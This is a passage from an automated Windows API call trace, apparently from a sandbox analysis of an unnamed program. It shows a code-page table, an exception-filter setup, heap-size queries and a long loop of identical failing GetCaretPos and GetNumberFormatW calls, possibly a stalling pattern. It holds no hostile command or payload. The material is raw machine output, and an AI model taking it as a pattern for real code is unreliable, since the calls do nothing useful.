!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÄA\\¨äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0023.373] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x408e0d) returned 0x0 [0023.374] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295518) returned 0x80 [0023.374] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295518) returned 0x80 [0023.374] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295518) returned 0x80 [0023.374] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295518) returned 0x80 [0023.375] lstrlenA (lpString="") returned 0 [0023.375] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.375] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.376] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.376] GetLastError () returned 0x57 [0023.376] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.377] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.377] GetLastError () returned 0x57 [0023.377] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.378] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.378] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.378] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.379] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.379] GetLastError () returned 0x57 [0023.379] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.380] GetLastError () returned 0x57 [0023.380] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.380] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.381] GetLastError () returned 0x57 [0023.381] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.381] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.382] GetLastError () returned 0x57 [0023.382] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.382] 